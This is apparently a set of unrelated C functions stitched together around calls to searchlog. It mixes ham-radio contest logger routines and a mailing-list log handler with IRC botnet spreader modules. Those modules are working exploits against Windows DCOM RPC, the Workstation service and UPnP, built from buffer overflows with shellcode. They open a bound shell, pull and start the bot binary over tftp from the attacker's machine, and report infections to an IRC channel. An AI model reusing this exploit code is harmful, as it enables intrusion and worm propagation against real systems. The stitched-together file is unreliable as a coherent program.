/* Perform the steps needed to grab a call and then free data * \return frequency of the spot in Hz */ static double execute_grab(spot *data) { extern char hiscall[]; extern char mode[]; extern int cqmode; extern float mem; extern float freq; double f = data->freq - fldigi_get_carrier(); set_outfreq(f); send_bandswitch((int) f); strcpy(hiscall, data->call); showinfo(getctydata_pfx(hiscall)); searchlog(hiscall); /* if in CQ mode switch to S&P and remember QRG */ if (cqmode == CQ) { cqmode = S_P; strcpy(mode, "S&P "); mem = freq; mvprintw(14, 68, "MEM: %7.1f", mem); } refreshp(); g_free(data->call); g_free(data); return f; }
void grab_next(void) { extern char hiscall[]; extern char mode[]; extern int cqmode; extern int trx_control; extern float mem; extern float freq; #ifdef HAVE_LIBHAMLIB extern freq_t outfreq; #else extern int outfreq; #endif static int dir = 1; /* start scanning up */ spot *data; if (trx_control == 0) return; data = bandmap_next( dir, (unsigned int)(freq*1000) ); if (data == NULL) { /* nothing in that direction */ /* try other one */ dir = 1 - dir; data = bandmap_next( dir, (unsigned int)(freq*1000)); } if (data != NULL) { outfreq = data -> freq; outfreq -= fldigi_get_carrier(); send_bandswitch( (int) outfreq ); strcpy( hiscall, data->call ); showinfo( getctydata( hiscall ) ); searchlog( hiscall ); /* if in CQ mode switch to S&P and remember QRG */ if (cqmode == CQ) { cqmode = S_P; strcpy(mode, "S&P "); mem = freq; mvprintw(14, 68, "MEM: %7.1f", mem); } refreshp(); g_free( data->call ); g_free( data ); } }
void grabspot(void) { extern char hiscall[]; extern char mode[]; extern int cqmode; extern int trx_control; extern float mem; extern float freq; #ifdef HAVE_LIBHAMLIB extern freq_t outfreq; #else extern int outfreq; #endif spot *data; if (trx_control == 0) return; if (hiscall[0] != '\0') { data = bandmap_lookup( hiscall ); if (data != NULL) { outfreq = data -> freq; outfreq -= fldigi_get_carrier(); send_bandswitch( (int) outfreq ); strcpy( hiscall, data->call ); showinfo( getctydata( hiscall ) ); searchlog( hiscall ); /* if in CQ mode switch to S&P and remember QRG */ if (cqmode == CQ) { cqmode = S_P; strcpy(mode, "S&P "); mem = freq; mvprintw(14, 68, "MEM: %7.1f", mem); } refreshp(); g_free( data->call ); g_free( data ); } } }
static void do_log(char *action,unsigned int actlen) { action += actlen; if (*action == '.' || *action == '_') ++action; if (!flaglist || remote.s == 0) strerr_die2x(100,FATAL,MSG(ERR_NOT_AVAILABLE)); if (!ismod) strerr_die2x(100,FATAL,MSG(ERR_NOT_ALLOWED)); showsend("log"); hdr_subject((*action == 0) ? MSG(SUB_LOG) : MSG(SUB_LOG_SEARCH)); hdr_ctboundary(); searchlog(workdir,action,code_subto); copybottom(0); qmail_to(&qq,mod.s); }
void calledit(void) { extern char hiscall[]; extern int block_part; int i = 0, l, b = 0; int j = 0; int x = 0; int cnt = 0, insertflg = 0; char call1[30], call2[10]; l = strlen(hiscall); b = l - 1; while ((i != 27) && (b <= strlen(hiscall))) { attroff(A_STANDOUT); attron(COLOR_PAIR(C_HEADER)); mvprintw(12, 29, " "); mvprintw(12, 29, hiscall); mvprintw(12, 29 + b, ""); /* no refreshp() here as getch() calls wrefresh() for the * panel with last output (whre the cursor should go */ i = key_get(); // <Delete> or <Insert> if ((i == KEY_DC) || (i == KEY_IC)) cnt++; else { if (i != 27) cnt = 0; } // <Tab> if (i == 9) block_part = 1; else block_part = 0; // Ctrl-A (^A) or <Home>, move to head of callsign field. if (i == 1 || i == KEY_HOME) { b = 0; x = 0; } // Ctrl-E (^E) or <End>, move to end of callsign field, exit edit mode. if (i == 5 || i == KEY_END) { b = strlen(hiscall); break; } // Left arrow if (i == KEY_LEFT) { if (b > 0) b--; // Right arrow } else if (i == KEY_RIGHT) { if (b < strlen(hiscall) - 1) { b++; } else break; /* stop edit */ // <Delete> } else if (i == KEY_DC) { l = strlen(hiscall); for (j = b; j <= l; j++) { hiscall[j] = hiscall[j + 1]; /* move to left incl. \0 */ } showinfo(getctydata_pfx(hiscall)); if (cnt > 1) searchlog(hiscall); // <Backspace> } else if (i == KEY_BACKSPACE) { if (b > 0) { b--; l = strlen(hiscall); for (j = b; j <= l; j++) { hiscall[j] = hiscall[j + 1]; } showinfo(getctydata_pfx(hiscall)); if (cnt > 1) searchlog(hiscall); } // <Insert> } else if (i == KEY_IC) { if (insertflg == 0) insertflg = 1; else insertflg = 0; // Any character left other than <Escape>. } else if (i != 27) { // Promote lower case to upper case. if ((i >= 97) && (i <= 122)) i = i - 32; // Accept A-Z or / and 1-9 if (((i >= 65) && (i <= 90)) || ((i >= 47) && (i <= 57))) { call2[0] = '\0'; if (b <= 12) { strncpy(call1, hiscall, b); strncpy(call2, hiscall + b, strlen(hiscall) - (b - 1)); } if (strlen(hiscall) + 1 == 12) break; // leave insert mode if (((i >= 65) && (i <= 90)) || ((i >= 47) && (i <= 57))) { call1[b] = i; call1[b + 1] = '\0'; if ((strlen(call1) + strlen(call2)) < 12) { strcat(call1, call2); // if (strlen(call1) + strlen(hiscall) >= 12) break; if (strlen(call1) >= 12) break; strcpy(hiscall, call1); } } if ((b < strlen(hiscall) - 1) && (b <= 12)) b++; else break; showinfo(getctydata_pfx(hiscall)); searchlog(hiscall); } else if (x != 0) i = 27; } else i = 27; } attroff(A_STANDOUT); attron(COLOR_PAIR(C_HEADER)); mvprintw(12, 29, hiscall); mvprintw(12, 29, " "); refreshp(); attron(A_STANDOUT); searchlog(hiscall); }
BOOL dcom(EXINFO exinfo) { char sendbuf[IRCLINE]; if (exinfo.port == 445) { NETRESOURCEW nr; if (!ConnectViaNullSession(exinfo.ip, &nr)) return FALSE; else { char szPipePath[MAX_PATH]; sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", exinfo.ip); HANDLE hFile = CreateFile(szPipePath, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile == INVALID_HANDLE_VALUE) { CloseNullSession(exinfo.ip); return FALSE; } // sprintf(sendbuf, "[dcom]: Connected to pipe \\\\%s\\pipe\\epmapper", exinfo.ip); // irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice); int TargetOS = FpHost(exinfo.ip, FP_PORT5K); // get shellcode DWORD reqbufsize; char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, TRUE); if (!reqbuf) { CloseHandle(hFile); CloseNullSession(exinfo.ip); return FALSE; } unsigned long lWritten; char *szInBuf = (char *)malloc(100000); memset(szInBuf, 0, 100000); // send the bind string DWORD dwRead; TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL); if (szInBuf[2] != 0x0C) { free(szInBuf); free(reqbuf); CloseHandle(hFile); CloseNullSession(exinfo.ip); return FALSE; } // send the evil request if (!WriteFile(hFile, reqbuf, reqbufsize, &lWritten, 0)) { free(szInBuf); free(reqbuf); CloseHandle(hFile); CloseNullSession(exinfo.ip); return FALSE; } BOOL Result = ReadFile(hFile, szInBuf, 10000, &dwRead, NULL); free(reqbuf); free(szInBuf); CloseHandle(hFile); CloseNullSession(exinfo.ip); if (Result == TRUE) { return FALSE; } } } else { // port 135 and others int TargetOS = FpHost(exinfo.ip, FP_RPC); if (TargetOS == OS_WINNT) return FALSE; // get a funky fresh socket SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP); if (sSocket == SOCKET_ERROR) return FALSE; // fill in sockaddr and resolve the host SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons((unsigned short)exinfo.port); ssin.sin_addr.s_addr = finet_addr(exinfo.ip); // get shellcode DWORD reqbufsize; char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, FALSE); if (!reqbuf) { fclosesocket(sSocket); return FALSE; } // connect to the server int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)); if (iErr == -1) { // connect failed, exit free(reqbuf); fclosesocket(sSocket); return FALSE; } // send the bind string if (fsend(sSocket, bindstr, sizeof(bindstr)-1, 0) == SOCKET_ERROR) { free(reqbuf); fclosesocket(sSocket); return FALSE; } // read reply char recvbuf[4096]; frecv(sSocket, recvbuf, 4096, 0); // Send the evil request if (fsend(sSocket, reqbuf, reqbufsize, 0) == SOCKET_ERROR) { free(reqbuf); fclosesocket(sSocket); return FALSE; } // read reply if (frecv(sSocket, recvbuf, 4096, 0) == SOCKET_ERROR) { free(reqbuf); fclosesocket(sSocket); return FALSE; } free(reqbuf); // Close the socket fclosesocket(sSocket); } sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip); for (int i=0; i < 6; i++) { if (searchlog(sendbuf)) { sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice); addlog(sendbuf); exploit[exinfo.exploit].stats++; break; } Sleep(5000); } return TRUE; }
BOOL WksSvc(EXINFO exinfo) { char sendbuf[IRCLINE]; char WksFile[MAX_PATH]; char cmd[500]; // Feel the wrath of my spontaneous comments SOCKET sock; char overwrite[2045] = ""; char exp_buf[2045+4+16+501]; char ip[30]; LPWSTR ipl[60]; DWORD jmpesp = 0x7518A747; //LPWSTR unicodesp0[(2045+4+16+501)*2]; char unicode[(2045+4+16+501)*2]; int z = 0; int x = 0; int len = 0; HINSTANCE hinstLib; MYPROC ProcAddr; BOOL fRunTimeLinkSuccess = FALSE; WSADATA wsaData; if (fWSAStartup(MAKEWORD(2, 0), &wsaData)) return 0; GetModuleFileName(0, WksFile, sizeof(WksFile)); // Will contain path + filename? :x // Lets build our request... Seeing as our shellcode binds us a shell, tftp is easy ;O _snprintf(cmd,sizeof(cmd), "tftp -i %s get %s" "&start %s&wank\n", GetIP(exinfo.sock),WksFile,WksFile); _snprintf(ip, 24, "\\\\%s", exinfo.ip); memset(overwrite, 0x41, 2000); memset(overwrite+2000, 0x90, 44); memcpy(exp_buf, overwrite, 2044); memcpy(exp_buf+2044, &jmpesp, 4); memset(exp_buf+2048, 0x90, 16); memcpy(exp_buf+2064, sc, sizeof(sc)); // Small problem, SP0 or SP1? (Trying an incorrect one will probably crash the target machine, so its one or the other :P) // SP1 for now, seems more popular. memset(unicode, 0x00, sizeof(unicode)); for (x = 0, z = 0; z <= sizeof(unicode); x++, z+=2) { unicode[z] = exp_buf[x]; } /* - SP0 Code len = MultiByteToWideChar(CP_ACP, NULL, exp_buf, sizeof(exp_buf), (unsigned short *)unicodesp0,sizeof(unicodesp0)); */ hinstLib = LoadLibrary("netapi32.dll"); // FIX ME: This is already loaded @ functions.h/loaddlls.cpp? MultiByteToWideChar(CP_ACP, NULL, ip, 30, (unsigned short*)ipl, 60); ProcAddr = (MYPROC) GetProcAddress(hinstLib,"NetAddAlternateComputerName"); if (NULL != ProcAddr) { fRunTimeLinkSuccess = TRUE; (ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicode,NULL,NULL,0); // Run NAACN with our nasty settings :O /* (ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicodesp0,NULL,NULL,0); */ } else { return FALSE; } // Exploit sent, lets check if they left us a shell :) Sleep(1000); // Testing only (May not be needed) // Lame old Thunderstorm socket checker. if((sock=WksSocket(3, 4444, exinfo.ip)) != -1) { // Send our TFTP/FTP request fsend(sock, cmd, strlen(cmd), 0); unsigned int nReadBytes; char received[1000]; while(1) { // Take a Break. Sleep(1000); unsigned long ul[2]; ul[0]=1; ul[1]=sock; struct timeval timeout; timeout.tv_sec=1; timeout.tv_usec=0; int l=fselect(0, (fd_set *)&ul, 0,0, &timeout); if ((l==1)) { if((nReadBytes = frecv(sock, received, sizeof(received), 0))!= SOCKET_ERROR && nReadBytes!=0) { received[nReadBytes]=0x00; if(strstr(received, "not recognized")) break; } } } } else { return FALSE; // (The shell either hasn't arrived or has crashed, so we quit.) } sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip); for (int i=0; i < 6; i++) { if (searchlog(sendbuf)) { sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice); addlog(sendbuf); exploit[exinfo.exploit].stats++; break; } Sleep(5000); } fclosesocket(sock); return TRUE; }
void calledit(void) { extern char hiscall[]; extern int block_part; int i = 0, l, b = 0; int j = 0; int x = 0; int cnt = 0, insertflg = 0; char dupecall[20]; char call1[30], call2[10]; l = strlen(hiscall); b = l - 1; while ((i != 27) && (b <= strlen(hiscall))) { attroff(A_STANDOUT); attron(COLOR_PAIR(C_HEADER)); mvprintw(12, 29, " "); mvprintw(12, 29, hiscall); mvprintw(12, 29 + b, ""); /* no refreshp() here as getch() calls wrefresh() for the * panel with last output (whre the cursor should go */ i = onechar(); if ((i == 161) || (i == 160)) // Ins / Del cnt++; else { if (i != 27) cnt = 0; } if (i == 9) block_part = 1; else block_part = 0; if (i == 1) // ctrl-A, home { b = 0; x = 0; } if (i == 5) // ctrl-E, End { b = strlen(hiscall) - 1; x = 0; } if (i == 155) { // left if (b > 0) b--; } else if (i == 154) { // right if (b < strlen(hiscall) - 1) { b++; } else break; /* stop edit */ } else if (i == 161) { /* delete */ l = strlen(hiscall); for (j = b; j <= l; j++) { hiscall[j] = hiscall[j + 1]; /* move to left incl. \0 */ } strncpy(dupecall, hiscall, 16); /* update cty info */ x = getctydata(dupecall); showinfo(x); if (cnt > 1) searchlog(hiscall); } else if (i == 127) { /* backspace */ if (b > 0) { b--; l = strlen(hiscall); for (j = b; j <= l; j++) { hiscall[j] = hiscall[j + 1]; } strncpy(dupecall, hiscall, 16); /* update cty info */ x = getctydata(dupecall); showinfo(x); if (cnt > 1) searchlog(hiscall); } } else if (i == 160) { /* insert */ if (insertflg == 0) insertflg = 1; else insertflg = 0; } else if (i != 27) { if ((i >= 97) && (i <= 122)) i = i - 32; if (((i >= 65) && (i <= 90)) || ((i >= 47) && (i <= 57))) { if (b <= 12) { strncpy(call1, hiscall, b); } if (b <= 12) { strncpy(call2, hiscall + b, strlen(hiscall) - (b - 1)); } if (strlen(hiscall) + 1 == 12) break; // leave insert mode if (((i >= 65) && (i <= 90)) || ((i >= 47) && (i <= 57))) { call1[b] = i; call1[b + 1] = '\0'; if ((strlen(call1) + strlen(call2)) < 12) { strcat(call1, call2); // if (strlen(call1) + strlen(hiscall) >= 12) break; if (strlen(call1) >= 12) break; strcpy(hiscall, call1); } } if ((b < strlen(hiscall) - 1) && (b <= 12)) b++; else break; strncpy(dupecall, hiscall, 16); /* update cty info */ x = getctydata(dupecall); showinfo(x); searchlog(hiscall); } else if (x != 0) i = 27; } else i = 27; } attroff(A_STANDOUT); attron(COLOR_PAIR(C_HEADER)); mvprintw(12, 29, hiscall); mvprintw(12, 29, " "); refreshp(); attron(A_STANDOUT); searchlog(hiscall); }
BOOL dcom2(EXINFO exinfo) { char sendbuf[IRCLINE],*pTemp; char szRecvBuf[4096],szLoadBuf[4096],szReqBuf[4096],szShellBuf[4096],szLoaderBuf[4096]; int iShellSize=0,iLoaderSize=0,iPos=0,iSCSize=0,iLoadSize=0,iReqSize=0; int TargetOS = FpHost(exinfo.ip, FP_RPC); if (TargetOS == OS_UNKNOWN || TargetOS == OS_WINNT) return FALSE; // get a funky fresh socket SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP); if (sSocket == SOCKET_ERROR) return FALSE; // fill in sockaddr and resolve the host SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons((unsigned short)exinfo.port); ssin.sin_addr.s_addr = finet_addr(exinfo.ip); iShellSize = GetRNS0TerminatedShellcode(szShellBuf, 4096, GetIP(exinfo.sock), filename); if (!iShellSize) return 0; iLoaderSize = EncodeRNS0(szLoaderBuf, 4096, dcom2_loader, sizeof(dcom2_loader)-1); memcpy(szLoadBuf+iPos, dcom2_shellcode_buf, sizeof(dcom2_shellcode_buf) ); iPos+=sizeof(dcom2_shellcode_buf); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, szLoaderBuf, iLoaderSize ); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, szShellBuf, iShellSize ); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_JMP_ADDR, &dcom2_my_offsets[0].lJmpAddr, 4 ); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_TOP_SEH, &dcom2_my_offsets[0].lTopSEH, 4 ); iLoadSize = iPos; iPos = 0; pTemp = szReqBuf+sizeof(dcom2_request1)-1; // Fill the request with the right sizes *(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iLoadSize / 2; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize / 2; pTemp=szReqBuf; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize - 12; *(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iLoadSize - 12; *(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iLoadSize - 12; *(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iLoadSize - 12; *(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iLoadSize - 12; *(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iLoadSize - 12; *(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iLoadSize - 12; *(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iLoadSize - 12; // connect with target IP int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)); if (iErr==-1) { // connect failed, exit fclosesocket(sSocket); return FALSE; } // send the bind string if (fsend(sSocket, dcom2_bindstr, sizeof(dcom2_bindstr)-1, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } // read reply frecv(sSocket, szRecvBuf, 4096, 0); // Check for DCE_PKT_BINDACK if (szRecvBuf[2] != DCE_PKT_BINDACK) { fclosesocket(sSocket); return FALSE; } // send evil request if (fsend(sSocket, szReqBuf, iReqSize, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } // read reply frecv(sSocket, szRecvBuf, 4096, 0); if (szRecvBuf[2] == DCE_PKT_FAULT) { fclosesocket(sSocket); return FALSE; } fclosesocket(sSocket); sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip); for (int i=0; i < 6; i++) { if (searchlog(sendbuf)) { sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice); addlog(sendbuf); exploit[exinfo.exploit].stats++; break; } Sleep(5000); } return TRUE; }
BOOL upnp(EXINFO exinfo) { char sendbuf[IRCLINE],szRequest[2048],szJmpCode[281],szExeCode[840]; int i; for(i = 0; i < 268; i++) szJmpCode[i] = (char)0x43; szJmpCode[268]=(char)0x4D; szJmpCode[269]=(char)0x3F; szJmpCode[270]=(char)0xE3; szJmpCode[271]=(char)0x77; szJmpCode[272]=(char)0x90; szJmpCode[273]=(char)0x90; szJmpCode[274]=(char)0x90; szJmpCode[275]=(char)0x90; //jmp [ebx+0x64], jump to execute shellcode szJmpCode[276]=(char)0xFF; szJmpCode[277]=(char)0x63; szJmpCode[278]=(char)0x64; szJmpCode[279]=(char)0x90; szJmpCode[280]=(char)0x00; for(i = 0; i < 32; i++) szExeCode[i] = (char)0x43; szExeCode[32] = (char)0x00; char *sc = (char *)malloc(4096); DWORD scsize = GetRNS0TerminatedShellcode(sc, 4096, GetIP(exinfo.sock), filename); if (!scsize) { free(sc); return FALSE; } strcat(szExeCode, sc); sprintf(szRequest, "%s%s\r\n\r\n", szJmpCode, szExeCode); SOCKET sSock = fsocket(AF_INET, SOCK_STREAM, 0); if (sSock == SOCKET_ERROR) { free(sc); return FALSE; } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons(exinfo.port); ssin.sin_addr.s_addr = finet_addr(exinfo.ip); memset(ssin.sin_zero, 0, 8); if (fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN)) == SOCKET_ERROR) { // Connect failed, exit free(sc); fclosesocket(sSock); return FALSE; } if (fsend(sSock, szRequest, strlen(szRequest)+1,0) == SOCKET_ERROR) { free(sc); fclosesocket(sSock); return FALSE; } free(sc); fclosesocket(sSock); Sleep(1000); sprintf(sendbuf,"[TFTPD]: File transfer started to IP: %s", exinfo.ip); if (searchlog(sendbuf, TRUE)) { sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice); addlog(sendbuf); exploit[exinfo.exploit].stats++; } return TRUE; }